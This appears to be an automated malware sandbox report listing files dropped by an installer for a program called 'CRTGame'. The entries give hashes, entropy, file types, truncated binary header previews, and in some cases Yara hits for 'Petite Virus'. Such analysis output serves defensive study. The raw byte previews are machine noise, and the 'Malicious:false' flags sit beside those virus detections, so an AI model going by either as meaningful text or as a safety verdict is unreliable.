                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.........n.......................................................B....@.........................P...........d.......@............s.......x..........................................................8............................................j..................@..@.rsrc.... ...........l..............@..@petite...............p..............`..`..................8..u...I.x|}...g{...@..ffe.c4.-.Bj..........U.J.`..s.N:`..I@;..B.kbmj..E%2. `....".]&.&.).BB...E..4u'.....Q.......%....V.............5...y....E..q<w.....j...B..O...p....*.X...m...= .X..........4........~~.8.F@.V...6....;?.5..)S.m.9U......^.zO!1o.F.E. ...H=`2...9.(...4).E.!G..;R.1.#.h0..(*..t8..O...Td.d..~...l.a..U...b<../..W....M6...U*G..II.x........>..I[...v.N/.V..3..Y.c...Zh.i..i.....n....M..D....5o."....(.9.+..z...._$t.T...X#\...N....Q%...>U..|....J
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):31936
                                                                        Entropy (8bit):6.6461204214578
                                                                        Encrypted:false
                                                                        SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                        MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                        SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                        SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                        SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):68876
                                                                        Entropy (8bit):7.922125376804506
                                                                        Encrypted:false
                                                                        SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                        MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                        SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                        SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                        SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-QRNOQ.tmp, Author: Joe Security
                                                                        Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):867854
                                                                        Entropy (8bit):4.9264497464202694
                                                                        Encrypted:false
                                                                        SSDEEP:12288:p3y+OSQJZyHHiz8ElQxPpspcQrRclB7OIlJiIoP:xSXyniz1lQxPpspcQrRcLZJi/
                                                                        MD5:B476CA59D61F11B7C0707A5CF3FE6E89
                                                                        SHA1:1A1E7C291F963C12C9B46E8ED692104C51389E69
                                                                        SHA-256:AD65033C0D90C3A283C09C4DB6E2A29EF21BAE59C9A0926820D04EEBBF0BAF6D
                                                                        SHA-512:D5415AC7616F888DD22560951E90C8A77D5DD355748FDCC3114CAA16E75EB1D65C43696C6AECD2D9FAF8C2D32D5A3EF7A6B8CB6F2C4747C2A82132D29C9ECBFE
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........>.........#.........:....................Xd................................l6........ ......................@..b....P..p................................*..........................L.......................0Q...............................text...D...........................`.P`.data...x...........................@.P..rdata...%.......&..................@.`@/4.......K.......L..................@.0@.bss.........0........................`..edata..b....@......................@.0@.idata..p....P......................@.0..CRT....,....`......................@.0..tls.........p......................@.0..reloc...*.......,..................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5960
                                                                        Entropy (8bit):5.956401374574174
                                                                        Encrypted:false
                                                                        SSDEEP:96:dj78cqhzbWKlECE7WbjDFf6IhaYYUOAoDf4+XCVhovG9AkM7Ui10:CjlEJ7WbjDFf6waYvdc4gYAkM10
                                                                        MD5:B3CC560AC7A5D1D266CB54E9A5A4767E
                                                                        SHA1:E169E924405C2114022674256AFC28FE493FBFDF
                                                                        SHA-256:EDDE733A8D2CA65C8B4865525290E55B703530C954F001E68D1B76B2A54EDCB5
                                                                        SHA-512:A836DECACB42CC3F7D42E2BF7A482AE066F5D1DF08CCCC466880391028059516847E1BF71E4C6A90D2D34016519D16981DDEEACFB94E166E4A9A720D9CC5D699
                                                                        Malicious:false
                                                                        Preview:MZ......................@...................................D.... ..PE..L......I...........!.....4...T......6`....... ...............................p......................................lc.......a.......@..H....................................................................................................................0..........................`....rsrc........@..H...................@..@.............P......................@................`......................`.......................................X....E......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!...`..f.`P....h....j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I.e...h....P..0................0..............h.... ..0...........6...........k...........
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):43520
                                                                        Entropy (8bit):6.232860260916194
                                                                        Encrypted:false
                                                                        SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                        MD5:B162992412E08888456AE13BA8BD3D90
                                                                        SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                        SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                        SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):34392
                                                                        Entropy (8bit):7.81689943223162
                                                                        Encrypted:false
                                                                        SSDEEP:768:mYBs3O9YL558R6R8P8W2rjQZQtfTIxRYsetoPNvPWIl+syr:vsUY15mqzW2u8rIxisFcJr
                                                                        MD5:EA245B00B9D27EF2BD96548A50A9CC2C
                                                                        SHA1:8463FDCDD5CED10C519EE0B406408AE55368E094
                                                                        SHA-256:4824A06B819CBE49C485D68A9802D9DAE3E3C54D4C2D8B706C8A87B56CEEFBF3
                                                                        SHA-512:EF1E107571402925AB5B1D9B096D7CEFF39C1245A23692A3976164D0DE0314F726CCA0CB10246FE58A13618FD5629A92025628373B3264153FC1D79B0415D9A7
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ph..4...4...4.......0...[...0...[...6...4.......V...0...`*..........5....)......Rich4...........................PE..L.....T...........!................6 .......................................0......................................D#..y....!..d.......X............................................................................................................................z..................`....rsrc...........X...................@..@....................................`...petite....... ......................`...................................................................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):197120
                                                                        Entropy (8bit):6.423554884287906
                                                                        Encrypted:false
                                                                        SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                        MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                        SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                        SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                        SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):123406
                                                                        Entropy (8bit):6.263889638223575
                                                                        Encrypted:false
                                                                        SSDEEP:1536:hnPkU1t2P2hHV5JG1YBBAUBEd8+poyez9djcx2/8s6UJqfxX+1XOAhbKzb3+d:xPu21IYyCTToE6c+6e+d
                                                                        MD5:B49ECFA819479C3DCD97FAE2A8AB6EC6
                                                                        SHA1:1B8D47D4125028BBB025AAFCA1759DEB3FC0C298
                                                                        SHA-256:B9D5317E10E49AA9AD8AD738EEBE9ACD360CC5B20E2617E5C0C43740B95FC0F2
                                                                        SHA-512:18617E57A76EFF6D95A1ED735CE8D5B752F1FB550045FBBEDAC4E8E67062ACD7845ADC6FBE62238C383CED5E01D7AA4AB8F968DC442B67D62D2ED712DB67DC13
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................R.......d>..........p....@...........................@......^........ ...............................@.4...................................................................................|.@.@............................text....Q.......R..................`.P`.data...\....p.......V..............@.@..rdata...a.......b...X..............@.`@/4..................................@.0@.bss.....c>...........................`..idata..4.....@.....................@.0..CRT....4.....@.....................@.0..tls..........@.....................@.0.................................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):845312
                                                                        Entropy (8bit):6.581151900686739
                                                                        Encrypted:false
                                                                        SSDEEP:24576:PgQ5Lxf4qcB5SdtFJPAYiXbJ1luVw6DbhJLJbCKShfCtk/8ou/UvfK7hs4I:H5Ng9zK5Puq7hsN
                                                                        MD5:00C672988C2B0A2CB818F4D382C1BE5D
                                                                        SHA1:57121C4852B36746146B10B5B97B5A76628F385F
                                                                        SHA-256:4E9F3E74E984B1C6E4696717AE36396E7504466419D8E4323AF3A89DE2E2B784
                                                                        SHA-512:C36CAE5057A4D904EBDB5495E086B8429E99116ACBE7D0F09FB66491F57A7FC44232448208044597316A53C7163E18C2F93336B37B302204C8AF6C8F1A9C8353
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2...va.va.va.b..fa.b...a.b..`a.$..ya.$..`a.$..1a.b..ua.va.*a. ...a. ..wa. ...wa.vat.wa. ..wa.Richva.................PE..L......c...........!.................F.......0............................... ......u.....@.......................... ...q..t...(....P.......................`..p.......T...........................8...@............0..D............................text............................... ..`.rdata...i...0...j..................@..@.data...............................@....rsrc........P.......(..............@..@.reloc..p....`......................@..B........................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):294926
                                                                        Entropy (8bit):6.191604766067493
                                                                        Encrypted:false
                                                                        SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                        MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                        SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                        SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                        SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):115712
                                                                        Entropy (8bit):6.401537154757194
                                                                        Encrypted:false
                                                                        SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                        MD5:840D631DA54C308B23590AD6366EBA77
                                                                        SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                        SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                        SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):127669
                                                                        Entropy (8bit):7.952352167575405
                                                                        Encrypted:false
                                                                        SSDEEP:3072:kdGUCKL7Wn/OzU2ThapTv773+HMnBasgGlBM:dn/mU8K/3EgNgoM
                                                                        MD5:75C1D7A3BDF1A309C540B998901A35A7
                                                                        SHA1:B06FEEAC73D496C435C66B9B7FF7514CBE768D84
                                                                        SHA-256:6303F205127C3B16D9CF1BDF4617C96109A03C5F2669341FBC0E1D37CD776B29
                                                                        SHA-512:8D2BBB7A7AD34529117C8D5A122F4DAF38EA684AACD09D5AD0051FA41264F91FD5D86679A57913E5ADA917F94A5EF693C39EBD8B465D7E69EF5D53EF941AD2EE
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-V4Q5G.tmp, Author: Joe Security
                                                                        Preview:MZ......................@...................................D.... ..PE..L....O?\...........!.................`.......................................p............@..........................b.......a.......0..@...........................................................................<b..H.................................... ..........................@..@.rsrc........0......................@..@......... ...@.........................@petite.......`......................`..`..........................................fE...nj.:<...n...1..}..r..". .S(...#!............7..5.Q..0..}.. .....^y...U...@..3.........&.lp(.pt.a......!..`@C.O3G7..."\..w.1u.$4..1h...M...K6.L...L..~.w...b2x-.......9k".....".V\............o..................qO&.......4(."0.Zy....2..Y..Z..:2.XM..D....a&..&.L,......./+......c<...^.2.x0..H.618....Q.Q.5.%...Z1.I.......a...q-}.0..D....o.!.....O.......B....# O.!....cY5.#...n.`..1...r!.)].:...m.f.....x....N"t.j..l.....:/...,.v........8F.N...X..j.R......"...&...
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):7910
                                                                        Entropy (8bit):6.931925007191986
                                                                        Encrypted:false
                                                                        SSDEEP:192:piDl1jKrGer007ia6abHX0d/aeHeN+VPHIJQxNiJCl9AK0f:IDJ9aDb30dCe+4PHIJrJCl9AK0f
                                                                        MD5:1268DEA570A7511FDC8E70C1149F6743
                                                                        SHA1:1D646FC69145EC6A4C0C9CAD80626AD40F22E8CD
                                                                        SHA-256:F266DBA7B23321BF963C8D8B1257A50E1467FAAAB9952EF7FFED1B6844616649
                                                                        SHA-512:E19F0EA39FF7AA11830AF5AAD53343288C742BE22299C815C84D24251FA2643B1E0401AF04E5F9B25CAB29601EA56783522DDB06C4195C6A609804880BAE9E9B
                                                                        Malicious:false
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-VNLOG.tmp, Author: Joe Security
                                                                        Preview:MZ......................@...................................D.... ..PE..L.....V...........!.................p.......0............................................@.........................Pr.......q..d....P.......................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`.........................................|7{M..... ........r B`.Zr..P.........T}.e..YJ...=.X..q.}......b.I...G.....^.d...R..-R.....d_.......K.q.H.A=.-S..,_.....L...........2.............u.u.%...:.q....c.[.....`...\.X..8..B.@L..3.7.q.....)!.- ...D.....p...J...RU..Q.A..[.#&..R.....".+4...px/7..\....4...., ..8...5.hV.>] ....3.-.<..I+.<r..T..H,Q..!..i--..+.Zq.[...H... ...N.8..#...a.x.iU.G..-_..R....Z(cT%.....S.P.U:g?...;....&....@..KI.X.Q..PQ..v..*....{..~..}..f....c..`....Q...q..%......,j.4.Y..)....Cf7..
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):967168
                                                                        Entropy (8bit):6.500850562754145
                                                                        Encrypted:false
                                                                        SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                        MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                        SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                        SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                        SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                        Category:dropped
                                                                        Size (bytes):506871
                                                                        Entropy (8bit):7.998074018431883
                                                                        Encrypted:true
                                                                        SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                        MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                        SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                        SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                        SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                        Malicious:false
                                                                        Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                        Category:dropped
                                                                        Size (bytes):506871
                                                                        Entropy (8bit):7.998074018431883
                                                                        Encrypted:true
                                                                        SSDEEP:12288:VCtY2iynJj4iqp1WjsxlD71zFusqzKZXGky4H2po:V+Y1y7qp0oxF7T3ZXGky4Wq
                                                                        MD5:D52F8AE89AC65F755C28A95C274C1FFE
                                                                        SHA1:50D581469FF0648EE628A027396F39598995D8B0
                                                                        SHA-256:2F9A9DFD0C0B0CFAF9C700B4659A4F2F3D11368E6C30A3FA0F93ECDD3B4D2E66
                                                                        SHA-512:B7B585EED261C262499C73688DFD985818F7869319285168AEEAC1F2CF5FAD487280FCAE1DAC633296E5DB0E0BC454495A09A90C2E37A7E7AF07EF93563503C6
                                                                        Malicious:false
                                                                        Preview:PK...........N..UD...."....$.AddWindowsExplorerShortcut.exe.. ..........p.../..L..../..L..../...Ykl...>3..f...6I..!7..qL.......Y;...M.HJ\....z....Y?R.B+P...*."......US.R.SB....i.....T.R.....**..3./;/..Q.].{....:s=t.c....|>...%....v:.Ot.....7.....il.rY^..4r.4.Gxl.3Yp...Q....X.".%......B......q..]k..7ae.O.....;..u.n....b..<............ w,.L'O.&...^.OJ...WT.X?RQOx|...}MA.n*.].q:!]iB`....|VW.!.@Br[...N.Xl....f....GH..~..h.......:zZ..'. ..n..._.......Gw../.X...t$$...Z.7...&X...[V.e..p..&z..-Wj.r...ku...VKg.t.5.......,.[.,G........w...}...6.rD.EN.#..uu...kb..5"..gL.>.....D.....N..!...1.o*..j..tD.!....H.X......a...._Fw..SQ~u{...4.to..7a.rrkT[.F.......nkV.....Sqc..f..gW..9Y.'.....L....U....\'=$...h...a...y...).?......Z......Z.l....+.b...O...h^.._..k......l._Q..m....w..s.eGm.=.nP..v57....H.U..6hQ~98z.A.'.z..H&...=.R.6..B'l...h...l....d]%./....<>....~....@..=....7...T0..J;.J....o.[.O..*..P.....'.k.......:.i.Bu.)...P#......^.....Jy.(o..:.?.......]./........
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):512014
                                                                        Entropy (8bit):6.566561154468342
                                                                        Encrypted:false
                                                                        SSDEEP:12288:BNKab1bu1dEpBZvkO4KTYnyA0bFHmufLKNs3gv:rKcozEpbvkOCyA0xGufLKau
                                                                        MD5:C4A2068C59597175CD1A29F3E7F31BC1
                                                                        SHA1:89DE0169028E2BDD5F87A51E2251F7364981044D
                                                                        SHA-256:7AE79F834A4B875A14D63A0DB356EEC1D356F8E64FF9964E458D1C2050E5D180
                                                                        SHA-512:0989EA9E0EFADF1F6C31E7FC243371BB92BFD1446CF62798DCA38A021FAD8B6ADB0AEABDFBDC5CE8B71FE920E341FC8AB4E906B1839C6E469C75D8148A74A08A
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P/.d...........#...(.l.........................n.........................P............@... ..........................:........... .......................0..L...........................d...........................P............................text....k.......l..................`..`.data................p..............@....rdata...t.......v...r..............@..@/4......L...........................@..@.bss....X................................edata...:.......<...j..............@..@.idata..............................@....CRT....,...........................@....tls................................@....rsrc........ ......................@....reloc..L....0......................@..B........................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):126478
                                                                        Entropy (8bit):6.268811819718352
                                                                        Encrypted:false
                                                                        SSDEEP:3072:UnNKg6JaJUeHjiaphKMLrn8uexz3TmBUg6xcE:UNcJGGehKMLJBUg6x
                                                                        MD5:6E93C9C8AADA15890073E74ED8D400C9
                                                                        SHA1:94757DBD181346C7933694EA7D217B2B7977CC5F
                                                                        SHA-256:B6E2FA50E0BE319104B05D6A754FE38991E6E1C476951CEE3C7EBDA0DC785E02
                                                                        SHA-512:A9F71F91961C75BB32871B1EFC58AF1E1710BDE1E39E7958AE9BB2A174E84E0DD32EBAAB9F5AE37275651297D8175EFA0B3379567E0EB0272423B604B4510852
                                                                        Malicious:false
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....^...................p.....m.........................p......f......... .........................{.... ...............................P..............................X........................!...............................text....\.......^..................`.P`.data........p.......b..............@.`..rdata..h&.......(...d..............@.`@/4......\B.......D..................@.0@.bss..................................`..edata..{...........................@.0@.idata....... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................
                                                                        Process:C:\Users\user\AppData\Local\Temp\is-0V6EF.tmp\j9htknb7BQ.tmp
                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):845312
                                                                        Entropy (8bit):6.581151900686739
                                                                        Encrypted:false
